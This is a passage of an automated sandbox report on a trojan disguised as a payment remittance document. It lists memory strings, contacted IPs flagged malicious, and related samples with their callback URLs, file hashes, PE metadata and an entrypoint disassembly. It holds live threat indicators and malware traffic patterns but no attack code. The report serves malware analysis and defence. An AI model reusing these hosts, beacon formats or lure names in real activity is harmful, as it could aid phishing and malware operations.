                                                      http://www.founder.com.cn/cnczElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/Y0nlElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/jp/Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sandoll.co.krQKElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212459989.0000000005F2D000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.comdElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.comdAOElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.carterandcone.com%$I/dElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low
                                                      http://www.carterandcone.commElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213196484.0000000005F2F000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.carterandcone.comlElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers/cabarga.htmlNElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.carterandcone.como..Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.founder.com.cn/cnElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213011209.0000000005F2D000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.212822532.0000000005F2D000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.com/designers/frere-jones.htmlElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216985898.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                          		high
                                                          http://www.jiyu-kobo.co.jp/tElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214195042.0000000005F2D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.carterandcone.comzElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.carterandcone.comyElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213244678.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/;O$dhElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          http://www.jiyu-kobo.co.jp/Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213811208.0000000005F2D000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.comoElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmp, Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216654283.0000000005F2F000.00000004.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers8Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000002.229094156.0000000007192000.00000004.00000001.sdmpfalse
                                                            		high
                                                            http://www.micro(D.dfElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213284821.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		low
                                                            http://www.fontbureau.comalsElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.217155173.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.zhongyicts.com.cnrsCIElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213161728.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/VOElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.fontbureau.comcomSElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.216127582.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/jp/0OElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213925578.0000000005F2D000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.carterandcone.comuehElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.213423791.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.jiyu-kobo.co.jp/-O6dElectronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe, 00000001.00000003.214635046.0000000005F2F000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown

                                                            Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            52.71.133.130
                                                            		www.johnharrisagent.comUnited States
                                                            		14618AMAZON-AESUSfalse
                                                            198.54.117.211
                                                            		unknownUnited States
                                                            		22612NAMECHEAP-NETUStrue
                                                            103.15.104.66
                                                            		v3lala99.cdnddd.netMalaysia
                                                            		55720GIGABIT-MYGigabitHostingSdnBhdMYtrue
                                                            198.54.117.215
                                                            		parkingpage.namecheap.comUnited States
                                                            		22612NAMECHEAP-NETUSfalse

                                                            General Information

                                                            Joe Sandbox Version:33.0.0 White Diamond
                                                            Analysis ID:483527
                                                            Start date:15.09.2021
                                                            Start time:08:14:45
                                                            Joe Sandbox Product:CloudBasic
                                                            Overall analysis duration:0h 10m 3s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:light
                                                            Sample file name:Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                            Number of analysed new started processes analysed:28
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:0
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • HDC enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Detection:MAL
                                                            Classification:mal100.troj.evad.winEXE@8/1@11/4
                                                            EGA Information:
                                                            • Successful, ratio: 100%
                                                            HDC Information:
                                                            • Successful, ratio: 63.9% (good quality ratio 57.1%)
                                                            • Quality average: 69.4%
                                                            • Quality standard deviation: 32.7%
                                                            HCA Information:
                                                            • Successful, ratio: 97%
                                                            • Number of executed functions: 0
                                                            • Number of non-executed functions: 0
                                                            Cookbook Comments:
                                                            • Adjust boot time
                                                            • Enable AMSI
                                                            • Found application associated with file extension: .exe
                                                            Warnings:
                                                            Show All
                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 92.122.145.220, 204.79.197.200, 13.107.21.200, 20.82.210.154, 23.35.236.56, 40.112.88.60, 23.216.77.209, 23.216.77.208
                                                            • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, e1723.g.akamaiedge.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com, www-bing-com.dual-a-0001.a-msedge.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                                            Simulations

                                                            Behavior and APIs

                                                            TimeTypeDescription
                                                            08:15:36API Interceptor64x Sleep call for process: Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe modified

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            52.71.133.130catalogo campione_0021.exeGet hashmaliciousBrowse
                                                            • www.blonohomesales.com/p3q8/?XjEP7rn=SmJymXHTOHzh2mODpH0/b6a2rttU4EqyY620WTN4/2YO0WOF3CKHJjBQQ+H+msZQkWXKyJfovg==&QPK=5jV4hVZ
                                                            revised quotation.exeGet hashmaliciousBrowse
                                                            • www.britrobertsrealtor.com/n58i/?MDHhFT=mBK5C8kKNeLnOBRL/3T2hMZE7okfl7IAcP/kfUwDuOFDQo447qX7+h6WtHNcYYtcMFZ+&h6=u0DLr058
                                                            NEW ORDER.exeGet hashmaliciousBrowse
                                                            • www.britrobertsrealtor.com/n58i/?0FNpaj8=mBK5C8kKNeLnOBRL/3T2hMZE7okfl7IAcP/kfUwDuOFDQo447qX7+h6WtHN2HodcIHR+&rPJpgz=GBMHuTwhVBI
                                                            BL COPY.exeGet hashmaliciousBrowse
                                                            • www.britrobertsrealtor.com/n58i/?tr4x8=1bxhLR18&IX3h5l=mBK5C8kKNeLnOBRL/3T2hMZE7okfl7IAcP/kfUwDuOFDQo447qX7+h6WtHNcYYtcMFZ+
                                                            bH8nV98LYu.exeGet hashmaliciousBrowse
                                                            • www.shirleyabrowerrealtor.com/fa0p/?zR0XgB=gPIx3pDxYlK&4hl0ibR=MvRmTuLwwyQZwgK3YYiG7KB5GvnBlUZ8DFUO14mvI6WqMsSM4hixWFgVlLnCQryC99za
                                                            xrHGQS1rz2.exeGet hashmaliciousBrowse
                                                            • www.irenehigginson.com/i7dg/?Qz=KBZ4dj0XENkP&2dnpGhRp=RKv9R3r324rqECNMQpwQcD+TtNzrebiuQaqq6euW1C9OfeVYpIPiEjipJWSoTYE6epD/
                                                            Scan#0068-46c3365.exeGet hashmaliciousBrowse
                                                            • www.andrewsteelsells.com/q3t0/?-Zl=6idTJ3MAhmjthBNVTJ2XuDMtfLW/2CXP3uLaEMGhGmhIqOq2RVzpVswBfbFOtMAa4qr0&gJBT-f=IFNTv2l8I
                                                            Shipping Documents.exeGet hashmaliciousBrowse
                                                            • www.hopematthewsrealtor.com/amb6/?c8n=8pm2sjSgmmTSFscavwD5UpILjrVjpPh3mP/S3l2xoyuhTXjCVVPg3vinZEFiQZEl0/31&Vt=QZbpwDmh5dWDM
                                                            IMAGE00037.exeGet hashmaliciousBrowse
                                                            • www.jasoneganrealtor.com/kkt/?0DKlKl=cc/nqGYAQYIM3Pt1Xwy2u5TuLJzmwQtvr0clQyawalrzoTK8+eLnoTutccqTHVKswWI+&UL=0balqH
                                                            FASMW.EXEGet hashmaliciousBrowse
                                                            • www.findthematchmakerrealtor.com/cabq/?h6R8xP=L/FIdmi9M2kSKwf8ScI+8YDyUdwD7p7Kj2yVOc9WwOzkqPyEJC2VW+A/3pD6I5dSpBvh&iZ=2di86hvH
                                                            EJIMS.exeGet hashmaliciousBrowse
                                                            • www.howdysellshomes.com/eo5u/?3fqHGn=ZlnpMphxFT&ATRPZLx=yfSEZOF/V+aHR3Qqu+TOTlJolf6SRhlBlkgMTnrUi9a7ISsQSkzVdaPaAGQDw9tGN+zc
                                                            SA-NQAW12n-NC9W03-pdf.exeGet hashmaliciousBrowse
                                                            • www.blakehaleyrealestate.com/uwec/?Rl4=YVFTx4yh&GFQl9jnp=9RHT2DLP46IJWlpPTosGw7NRwYJtTk68eEdvTXInG9v5n7yAqhkX2tGT0EYgCY2WM8rv
                                                            RFQ-V-SAM-0321D056-DOC.exeGet hashmaliciousBrowse
                                                            • www.blakehaleyrealestate.com/uwec/?v2=9RHT2DLP46IJWlpPTosGw7NRwYJtTk68eEdvTXInG9v5n7yAqhkX2tGT0EYgCY2WM8rv&CZ6=7nExZbW
                                                            TSPO0001978-xlxs.exeGet hashmaliciousBrowse
                                                            • www.blakehaleyrealestate.com/uwec/?-ZVd=1bgta&T8VxaVs=9RHT2DLP46IJWlpPTosGw7NRwYJtTk68eEdvTXInG9v5n7yAqhkX2tGT0EYgCY2WM8rv
                                                            igPVY6UByI.exeGet hashmaliciousBrowse
                                                            • www.gregismyrealestateagent.com/evpn/?6lB4ir3X=UDxzuRprqZDJvJoKVzbwL1i6nUgviHPd/6Kvoeyj55HiZxQYyGLzJE1yAaeHFu5gVc5c&lZQ=fxoxjP38
                                                            MACHINE SPECIFICATIONS.exeGet hashmaliciousBrowse
                                                            • www.melekhemfuzaylovrealtor.com/rrrq/?ATxdA4s=pwrgH0dcWtE6RcnjvsF+gBwj2enFa+fTozhnxLgTWRaQ9ETFCh2EIcQryx3dD2YPpuUAmv+cig==&4hO=uDHPhJIxONuPbDb
                                                            purchase order#034.exeGet hashmaliciousBrowse
                                                            • www.patticrumprealestate.com/8ufh/?EzrthRhp=U8w9/jPqiyF9T6rAv+nd1qZLEbDwevisuc0vxVqKX7gCId07x/wriiT59VLN/LUTeuQy&ojo0f=SzrhU8
                                                            dwg.exeGet hashmaliciousBrowse
                                                            • www.evamichellevermeeschrealtor.com/ripw/?YL0=AbZvoGEXXQ2UeGMkjKvPTH9y6CbrSsxy+uP80hsvy1agLthBgMYihPZc0BWoiy3movbA&DhAH08=9rzdODV81V
                                                            PO#416421.exeGet hashmaliciousBrowse
                                                            • www.propertiesbyjose.com/wpsb/?GFQL6=9rzdF4d0LhP&pvbxILHp=HEs1UZJZzTZh4b/CLgTQtUFl/p4LqgX1DDiD2qBPcXJWn7sMmrEWnzV34lgPleSeyaCceIjMPg==
                                                            POgMmI.exeGet hashmaliciousBrowse
                                                            • www.landeverrealestate.com/wsu/?FDHH=o0d7uZds/Uq3OyNWot+oiPxVX9Lhq1LOweo6JSl71P7OyksdMpdvphbquE+Kn7tuvWRF0Atuwg==&Rl=Vtx0J

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            parkingpage.namecheap.comdebit.xlsxGet hashmaliciousBrowse
                                                            • 198.54.117.212
                                                            Data Sheet and Profile.exeGet hashmaliciousBrowse
                                                            • 198.54.117.215
                                                            4444.exeGet hashmaliciousBrowse
                                                            • 198.54.117.218
                                                            3RBawvxxeY.exeGet hashmaliciousBrowse
                                                            • 198.54.117.210
                                                            grace $$.exeGet hashmaliciousBrowse
                                                            • 198.54.117.212
                                                            RFQ_PO_009890_pdf.exeGet hashmaliciousBrowse
                                                            • 198.54.117.210
                                                            SpZP2QerMU.exeGet hashmaliciousBrowse
                                                            • 198.54.117.211
                                                            Purchase Order# 210145.exeGet hashmaliciousBrowse
                                                            • 198.54.117.215
                                                            RFQ 10305 .xlsxGet hashmaliciousBrowse
                                                            • 198.54.117.212
                                                            BIN.exeGet hashmaliciousBrowse
                                                            • 198.54.117.216
                                                            REMMITANCE COPY.exeGet hashmaliciousBrowse
                                                            • 198.54.117.210
                                                            jxotfrv2bv.exeGet hashmaliciousBrowse
                                                            • 198.54.117.212
                                                            zXv0Gd4tPi.exeGet hashmaliciousBrowse
                                                            • 198.54.117.210
                                                            PO747484992.exeGet hashmaliciousBrowse
                                                            • 198.54.117.217
                                                            YgAynTdpcncdnG4.exeGet hashmaliciousBrowse
                                                            • 198.54.117.217
                                                            PO_PRICE_REQUEST_00989_PDF.exeGet hashmaliciousBrowse
                                                            • 198.54.117.212
                                                            New order.pdf.exeGet hashmaliciousBrowse
                                                            • 198.54.117.215
                                                            PO.xlsxGet hashmaliciousBrowse
                                                            • 198.54.117.212
                                                            Transfer_form_$157,890.xlsxGet hashmaliciousBrowse
                                                            • 198.54.117.211
                                                            GosMzUpnGu.exeGet hashmaliciousBrowse
                                                            • 198.54.117.217

                                                            ASN

                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                            AMAZON-AESUSPO7420.exeGet hashmaliciousBrowse
                                                            • 52.4.209.250
                                                            DLH1TwLBhW.exeGet hashmaliciousBrowse
                                                            • 50.16.244.183
                                                            avxeC9WssiGet hashmaliciousBrowse
                                                            • 54.57.110.152
                                                            Quotation urgent.exeGet hashmaliciousBrowse
                                                            • 52.201.24.227
                                                            KOC RFQ.docGet hashmaliciousBrowse
                                                            • 52.204.77.43
                                                            PO. 2100002_pdf____________________________________.exeGet hashmaliciousBrowse
                                                            • 3.223.115.185
                                                            hhh.mp3.dllGet hashmaliciousBrowse
                                                            • 54.243.45.255
                                                            xrm4z50ja9.exeGet hashmaliciousBrowse
                                                            • 54.83.52.76
                                                            Swift Trf.exeGet hashmaliciousBrowse
                                                            • 52.201.24.227
                                                            HjIXsbs4JgGet hashmaliciousBrowse
                                                            • 54.142.124.216
                                                            7b388AC1FwGet hashmaliciousBrowse
                                                            • 44.194.145.151
                                                            DPD.apkGet hashmaliciousBrowse
                                                            • 50.16.244.183
                                                            Po2142021.xlsxGet hashmaliciousBrowse
                                                            • 18.213.250.117
                                                            FlashPlayerUpdate.apkGet hashmaliciousBrowse
                                                            • 23.21.76.7
                                                            QcXQmNSaSpGet hashmaliciousBrowse
                                                            • 18.207.108.88
                                                            i586Get hashmaliciousBrowse
                                                            • 34.231.175.5
                                                            armGet hashmaliciousBrowse
                                                            • 54.133.131.54
                                                            zoD4YzpMMGGet hashmaliciousBrowse
                                                            • 54.80.227.212
                                                            mipsGet hashmaliciousBrowse
                                                            • 34.225.41.128
                                                            x86_64Get hashmaliciousBrowse
                                                            • 54.167.122.15
                                                            GIGABIT-MYGigabitHostingSdnBhdMYClh974QBqGGet hashmaliciousBrowse
                                                            • 103.21.89.29
                                                            k6uiZJTzLi.exeGet hashmaliciousBrowse
                                                            • 103.91.67.83
                                                            Y22uvB2InU.exeGet hashmaliciousBrowse
                                                            • 103.91.67.83
                                                            sbFQSOHQS9.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            zidwvnFsej.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            awVwuEPo4t.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            jr8m2SSa1e.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            z33RH5liBO.exeGet hashmaliciousBrowse
                                                            • 103.91.67.83
                                                            OIHcOp52HF.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            n5MFenscid.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            v6TB5C7KtW.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            OhfbJIz1X7.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            02xCEgwyK3.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            refno.exeGet hashmaliciousBrowse
                                                            • 103.91.67.83
                                                            oaG6jOntjLGet hashmaliciousBrowse
                                                            • 103.229.227.24
                                                            UZOM POWER.exeGet hashmaliciousBrowse
                                                            • 103.27.74.97
                                                            JFBlvEr5H9.exeGet hashmaliciousBrowse
                                                            • 103.91.67.83
                                                            olG7GnXKKT.exeGet hashmaliciousBrowse
                                                            • 103.91.67.83
                                                            ORDER 200VPS.xlsxGet hashmaliciousBrowse
                                                            • 103.91.67.83
                                                            uLTvM5APNY.exeGet hashmaliciousBrowse
                                                            • 43.231.4.7
                                                            NAMECHEAP-NETUSP67mzce6yI.exeGet hashmaliciousBrowse
                                                            • 198.54.122.60
                                                            Gu#U00eda de carga.pdf.exeGet hashmaliciousBrowse
                                                            • 198.54.122.60
                                                            debit.xlsxGet hashmaliciousBrowse
                                                            • 198.54.117.212
                                                            Pharmaceutical Inquiry.docGet hashmaliciousBrowse
                                                            • 198.54.122.60
                                                            diagram-129.docGet hashmaliciousBrowse
                                                            • 198.54.124.27
                                                            diagram-129.docGet hashmaliciousBrowse
                                                            • 198.54.124.27
                                                            diagram-129.docGet hashmaliciousBrowse
                                                            • 198.54.124.27
                                                            deck.exeGet hashmaliciousBrowse
                                                            • 198.54.122.60
                                                            diagram-477.docGet hashmaliciousBrowse
                                                            • 198.54.124.27
                                                            diagram-477.docGet hashmaliciousBrowse
                                                            • 198.54.124.27
                                                            diagram-477.docGet hashmaliciousBrowse
                                                            • 198.54.124.27
                                                            PO0140092021.docGet hashmaliciousBrowse
                                                            • 198.54.122.60
                                                            I210820-0002 D1#U96a8#U6a5f-#U6d77#U95dc#U767c#U7968-R1_pdf.exeGet hashmaliciousBrowse
                                                            • 198.54.115.133
                                                            DHL-AWD6909800855.docGet hashmaliciousBrowse
                                                            • 104.219.248.49
                                                            doc03633420210907151503.docGet hashmaliciousBrowse
                                                            • 198.54.122.60
                                                            obizx.exeGet hashmaliciousBrowse
                                                            • 104.219.248.49
                                                            fytfireuiwfgdcukyd.docGet hashmaliciousBrowse
                                                            • 198.54.122.60
                                                            DHL-AWD6909800855.docGet hashmaliciousBrowse
                                                            • 104.219.248.49
                                                            wuH92YGkZk.exeGet hashmaliciousBrowse
                                                            • 104.219.248.45
                                                            3VFWIsGexy.exeGet hashmaliciousBrowse
                                                            • 198.54.115.195

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe.log
                                                            Process:C:\Users\user\Desktop\Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1302
                                                            Entropy (8bit):5.3499841584777394
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4Ks2E1qE4bE4K5AE4Kzr7RKDE4KhK3VZ9pKhPKIE4oKFKHKorE4x84j:MIHK5HKXE1qHbHK5AHKzvRYHKhQnoPtW
                                                            MD5:E2C3A19FF3EBB1649BF9F41DFE3B7E8F
                                                            SHA1:5DA8AB9561D3C096BB9103413F64EE6E50D5AD88
                                                            SHA-256:18E921771341555EF6167DEBBD7C83727518897E9B4B3545B7CCDB48E2043B74
                                                            SHA-512:6B62A68EC358699D55E4CCD0BBDD4ADDC0F38641D82A019697893CEB503E853A5F087FAF9F4408425AD6631C9CBA31C3354FD98B45F051F2F59A0ECC3CA2FA06
                                                            Malicious:true
                                                            Reputation:moderate, very likely benign file
                                                            Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21e8e2b95c\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assem

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.463479204604476
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:Electronic Payment Remittance Document 09.13.21 VRF 65665011119889.exe
                                                            File size:509952
                                                            MD5:e29285288905ebb27d9e4443bcaa6638
                                                            SHA1:3c656f9257b7630e47f57d1326bceafb7481ab29
                                                            SHA256:7027a232f8327a532a1b37586cd42ea73ea0b9c37b1b22334484888f0b13b6b6
                                                            SHA512:16fc6b4d5f0f258ac3887295843553e524276ce4fa127ce01cd49118b8765823885065daf3c2cab716529c6fbe97e2ea47233e88215852b528be6e68e801da1f
                                                            SSDEEP:12288:tqk4DbF53e0IUFLe8OsbVPIBNpvv5Cq9HS2W3wI7GJFY:Gy8dPOX5CSy2WW8
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....#@a..............0.................. ........@.. ....................... ............@................................

                                                            File Icon

                                                            Icon Hash:00828e8e8686b000

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x47daca
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                            Time Stamp:0x61402397 [Tue Sep 14 04:22:47 2021 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:v4.0.30319
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            sub byte ptr [eax], al
                                                            sub al, 00h
                                                            sub dword ptr [eax], eax
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
